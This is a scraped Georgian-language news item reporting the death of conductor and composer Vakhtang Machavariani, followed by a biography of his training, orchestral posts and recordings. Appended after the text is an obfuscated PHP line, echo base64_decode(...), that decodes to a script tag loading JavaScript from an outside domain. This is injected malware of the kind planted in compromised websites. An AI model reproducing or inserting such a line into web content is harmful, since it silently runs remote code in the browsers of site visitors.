gorgia
ავერსი jaluzi

დირიჟორი, კომპოზიტორი და მუსიკოსი ვახტანგ მაჭავარიანი გარდაიცვალა. ამის შესახებ ინფორმაციას ახლობლები ავრცელებენ. ხელოვანი 74 წლის ასაკში გარდაიცვალა.

დაამთავრა თბილისის სახელმწიფო კონსერვატორიის საფორტეპიანო (1973, ე. გურევიჩის კლასი) და სადირიჟორო (1977, ო. დიმიტრიადის კლასი) ფაკულტეტები. სტაჟირება სადირიჟორო განხრით გაიარა მოსკოვში გ. როჟდესტვენსკისთან და ვენის მუსიკალურ აკადემიაში კ. ოსტერრაიხერთან, იმავდროულად იყო ვენის ოპერაში ლ. მააზელის ასისტენტი.

1984–1990წწ. თანამშრომლობდა სანქტ-პეტერბურგის მარინის თეატრთან. იქვე იყო ა. მაჭავარიანის ბალეტ „ვეფხისტყაოსნის" დამდგმელი დირიჟორი. ამავე პერიოდში თანამშრომლობდა მოსკოვის დიდ თეატრთან და ევროპის საოპერო დასებთან.

1987 წელს იყო საქართველოს მუსიკალური საზოგადოების კამერული ორკესტრის მთავარი დირიჟორი (ორი სეზონი).

1990 წელს დააფუძნა მარინისა და დიდი თეატრების, სანქტ-პეტერბურგისა და მოსკოვის ფილარმონიების, ბალტიისპირეთის ქვეყნების, საქართველოსა და უკრაინის წამყვანი ორკესტრების 120 მუსიკოსისაგან შემდგარი საფესტივალო ორკესტრი, რომლის მთავარი დირიჟორი და სამხატვრო ხელმძღვანელი თავადვე იყო.

1996 წლიდან იყო ე. მიქელაძის სახელობის საქართველოს სახელმწიფო სიმფონიური ორკესტრის მთავარი დირიჟორი; 1998–2004წწ. სამხატვრო ხელმძღვანელი. 2000–2008წწ. მან რუსეთში დააარსა და ხელმძღვანელობდა დიდ სიმფონიურ ორკესტრ "მილენიუმს". მისი ინიციატივითა და დირიჟორობით საქართველოში გაიმართა არაერთი პრემიერა: ჯ. ვერდის "ფალსტაფი" (2002), რ. ვაგნერის "ტრისტანი და იზოლდა" (2003).

სიმფონიური სურათი "მარიუპოლი" მიუძღვნა 2022 წელს უკრაინაში განვითარებულ მოვლენებს. გამოცემულია მისი სადირიჟორო რეპერტუარის და მის მიერ შესრულებული საფორტეპიანო კომპოზიციების გრამფირფიტები, კომპაქტდისკები. იყო თბილისის ოპერისა და ბალეტის სახელმწიფო აკადემიური თეატრის მოწვეული დირიჟორი. პიანისტი.

141
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");